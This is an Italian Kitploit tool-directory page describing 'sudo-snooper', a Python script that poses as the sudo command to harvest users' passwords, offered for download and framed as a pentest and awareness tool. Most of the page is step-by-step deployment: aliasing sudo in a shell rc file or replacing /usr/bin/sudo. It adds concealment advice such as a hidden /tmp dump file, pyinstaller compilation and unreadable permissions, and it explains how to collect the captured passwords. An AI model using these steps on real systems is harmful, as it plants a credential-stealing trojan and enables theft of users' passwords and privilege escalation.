Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
sudo-snooper — Script Python che si comporta come il binario sudo originale per ingannare gli utenti e far loro inserire le loro password. | Kitploit
Strumenti/GitHubGitHub/xorond/sudo-snooper
Strumenti di PhishingAttacchi alle PasswordPenetration TestingIngegneria Sociale
GitHubxorond/sudo-snooper

sudo-snooper

Script Python che si comporta come il binario sudo originale per ingannare gli utenti e far loro inserire le loro password.

Vedi Repository
70346 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

sudo-snooper

sudo-snooper si comporta come il binario sudo originale per indurre gli utenti a inserire la propria password.

Mostrerà un prompt falso proprio come quello originale all'utente per inserire la propria password sudo.

Questo può essere utile in test di penetrazione o valutazioni di sicurezza per testare la consapevolezza degli utenti.

Passaggi di installazione

Opzione 1 - Creare un alias per il comando sudo (più facile ma un po' più evidente)

Questa opzione è più facile da realizzare e più portabile, tuttavia potrebbe essere più evidente per utenti attenti.

Modifica il file .rc della shell che l'utente sta utilizzando (può essere .bashrc, .zshrc e così via) e aggiungi quanto segue:

root@kitploit:~
alias sudo='python3 /path/to/sudo-snooper.py'

Assicurati che sudo-snooper.py abbia i permessi corretti.

Opzione 2 - Installare al posto del vero sudo (più difficile ma meno evidente)

È necessario l'accesso root per questa opzione di installazione

Questo diventa utile solo se hai già accesso root ma non riesci a decifrare gli hash di /etc/shadow per qualche motivo. In pratica puoi ottenere tramite phishing la password dell'utente.

  • sposta il binario sudo originale con un altro nome
root@kitploit:~
# mv /usr/bin/sudo /usr/bin/somename
  • modifica i parametri nel file a tuo piacimento

Modifica questi in sudo-snooper.py:

root@kitploit:~
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
  • installa il file python in /usr/bin/sudo (o ovunque si trovasse sudo prima)
root@kitploit:~
# install -dm755 sudo-snooper.py /usr/bin/sudo
  • assegna i permessi necessari al file python

    Puoi essere creativo qui e creare un file eseguibile non leggibile per gli utenti, ma non entrerò nei dettagli. Dai un'occhiata ad alcune risposte qui per questo.

NOTA: Un modo un po' più convincente per installarlo è compilarlo usando pyinstaller in modo che non appaia come un file python quando viene eseguito file /usr/bin/sudo.

Per farlo su Archlinux: pyinstaller --onefile sudo-snooper.py funzionerà. Tuttavia, tieni presente che una volta compilato non sarai in grado di modificare i parametri nel binario compilato.

Utilizzo:

Una volta installato, sudo-snooper può essere chiamato proprio come il normale sudo.

Ad esempio, eseguendo

root@kitploit:~
sudo vim /etc/resolv.conf

farà sì che venga chiamato sudo-snooper (supponendo che sia installato correttamente).

Chiederà la password dell'utente e poi eseguirà il comando reindirizzando al binario sudo reale se la password è corretta.

Puoi quindi recuperare la password dell'utente leggendo il file di dump nelle impostazioni.

TODO:

  • gestire il caso in cui l'utente inserisca una password errata
Scarica lo strumento